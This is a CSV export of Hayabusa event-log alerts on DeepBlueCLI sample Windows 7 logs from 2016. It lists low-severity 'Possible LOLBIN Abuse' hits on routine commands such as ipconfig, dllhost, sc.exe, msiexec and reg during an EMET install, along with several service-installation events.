2016-08-31 09:12:06.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:12:06.951 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 00:54:06.516 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1100 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 00:54:07.012 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 00:54:07.725 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 00:54:07.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 00:54:09.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1464 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 00:54:28.302 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 01:12:27.928 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1274 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 01:12:27.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8d0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 01:18:44.431 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1044 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 01:18:44.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x16d4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 02:01:48.411 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 02:01:48.594 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1728 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 02:01:48.666 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 02:03:48.398 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x14b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 02:09:30.260 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 02:09:39.134 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 02:10:01.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1720 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 02:26:02.115 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb0c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:00:10.327 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x7f4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:05:18.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x12bc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:06:54.664 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:06:54.679 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{86D5EB8A-859F-4C7B-A76B-2BD819B7A850} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:39:28.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:39:28.691 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11e0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:39:28.743 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:39:28.761 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:39:28.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:39:28.809 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:46:10.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1158 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:46:27.488 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x14c8 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:46:27.704 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x2ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:47:09.257 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:47:09.370 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x16bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:01.641 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 29CF125E202451A4ADA81BD9D0C1A3B7 | Path: C:\Windows\System32\msiexec.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:09.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22A181542763035A5FF1244203DB5EDC E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:18.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xa48 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:20.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpPortSharing restricted | Path: C:\Windows\System32\sc.exe | PID: 0x13e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:20.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpPortSharing SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:20.355 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Net.Tcp Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 05:48:20.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:20.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1558 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:20.416 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Net.Pipe Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 05:48:20.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetPipeActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x1660 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:20.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetPipeActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:20.450 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Net.Msmq Listener Adapter | Path: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"" -NetMsmqActivator | Account: NT AUTHORITY\NetworkService | Start Type: disabled",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 05:48:20.460 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetMsmqActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x968 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:20.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetMsmqActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x710 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:48:22.723 +09:00,IE10Win7,7045,info,,New Service Installed,Name: ASP.NET State Service | Path: %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Account: LocalSystem | Start Type: disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 05:49:59.321 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x128c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:05.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x17e4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:05.541 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:19.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4DE932ADC1206E85CE03A5855ECF29FC | Path: C:\Windows\System32\msiexec.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:19.686 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Microsoft EMET Service | Path: ""C:\Program Files\EMET 5.5\EMET_Service.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 05:50:19.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22F8D0F1805E128ED9C40EA3A4181C89 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:20.040 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\microsoft\emet_up hklm\software\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:20.058 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""regsvr32.exe"" /s ""C:\Program Files\EMET 5.5\EMET_CE.DLL"" | Path: C:\Windows\System32\regsvr32.exe | PID: 0x17d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:20.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x13d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:50:20.214 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\policies\microsoft\emet_up hklm\software\policies\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x17c0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
